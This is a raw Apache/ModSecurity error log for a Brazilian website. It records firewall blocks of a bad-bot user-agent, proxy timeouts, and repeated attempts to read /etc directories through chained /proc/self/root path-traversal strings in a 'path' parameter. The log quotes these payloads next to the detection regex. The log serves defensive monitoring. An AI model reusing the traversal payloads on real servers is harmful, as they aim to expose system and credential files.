[Thu Mar 19 10:44:07.491401 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.228.61:37278] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abv9p8df6f5d65gmYZR17AAAAsA"]
[Thu Mar 19 10:44:08.445707 2026] [:error] [pid 27403:tid 140411582465792] [client 74.7.243.128:39554] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv9qBkFeYa1D6dYQnDvOgAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:44:13.593994 2026] [proxy_fcgi:error] [pid 17653:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:33600] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:44:16.274048 2026] [:error] [pid 14269:tid 140411599251200] [client 74.7.243.128:44658] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv9sAbLMZ6AikZjR9VcQQAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:44:37.122760 2026] [proxy_fcgi:error] [pid 30077:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:34110] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:45:02.279076 2026] [proxy_fcgi:error] [pid 26799:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:34726] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:45:04.923004 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:44670] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv94OyqAr6etmhZHNpf1gAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:45:28.057912 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:35406] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:45:43.044894 2026] [:error] [pid 19093:tid 140411691570944] [client 74.7.243.128:43118] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv-B1_V7PWP6ixUYl67TgAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:45:49.274433 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:57040] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv-DQkwaGbbGflqUZC_sgAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:45:51.125809 2026] [proxy_fcgi:error] [pid 27293:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:35994] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:45:54.975001 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.244.43:53710] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abv-Esdf6f5d65gmYZR2GwAAAso"]
[Thu Mar 19 10:46:12.125853 2026] [proxy_fcgi:error] [pid 17887:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:36478] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:46:16.022392 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.243.128:54512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv-KPu8EFLIOrSqIpukqgAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:46:29.773504 2026] [:error] [pid 27403:tid 140411683178240] [client 74.7.243.128:54584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv-NRkFeYa1D6dYQnDvdwAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:46:35.141876 2026] [proxy_fcgi:error] [pid 15826:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:37012] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:46:42.386962 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:49366] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv-QuyqAr6etmhZHNpf_wAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:46:47.608306 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.243.128:53992] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv-RwkwaGbbGflqUZC_5gAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:46:58.149794 2026] [proxy_fcgi:error] [pid 27403:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:37526] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:47:20.117621 2026] [proxy_fcgi:error] [pid 17887:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:38044] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:47:23.121131 2026] [:error] [pid 14269:tid 140411624429312] [client 74.7.243.128:44732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv-agbLMZ6AikZjR9VcqAAAAA4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:47:26.550876 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:48906] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv-bgkwaGbbGflqUZC__wAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:47:35.300870 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.243.128:49144] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv-d-yqAr6etmhZHNpgFQAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:47:41.133782 2026] [proxy_fcgi:error] [pid 31803:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:38614] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:47:51.052107 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:49152] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv-h8df6f5d65gmYZR2XAAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:47:57.977293 2026] [:error] [pid 27403:tid 140411683178240] [client 74.7.243.128:56880] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv-jRkFeYa1D6dYQnDvnwAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:48:03.133792 2026] [proxy_fcgi:error] [pid 26799:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39138] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:48:18.548494 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:59866] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv-ovu8EFLIOrSqIpuk8QAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:48:27.137971 2026] [proxy_fcgi:error] [pid 17653:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:39606] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:48:42.966993 2026] [:error] [pid 19093:tid 140411540502272] [client 74.7.243.128:33468] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv-ul_V7PWP6ixUYl67uQAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:48:46.918552 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:55928] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv-vsdf6f5d65gmYZR2fAAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:48:51.239715 2026] [:error] [pid 17653:tid 140411641214720] [client 74.7.243.128:36268] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv-w8df6f5d65gmYZR2gAAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:48:52.130226 2026] [proxy_fcgi:error] [pid 17887:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:40204] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:48:59.063061 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:36272] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv-ywkwaGbbGflqUZDARwAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:49:11.923281 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.228.61:40382] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abv-1wkwaGbbGflqUZDATQAAAMQ"]
[Thu Mar 19 10:49:16.151472 2026] [proxy_fcgi:error] [pid 14269:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:40842] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:49:28.461058 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.243.128:37096] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv-6Mdf6f5d65gmYZR2lwAAAtI"], referer: 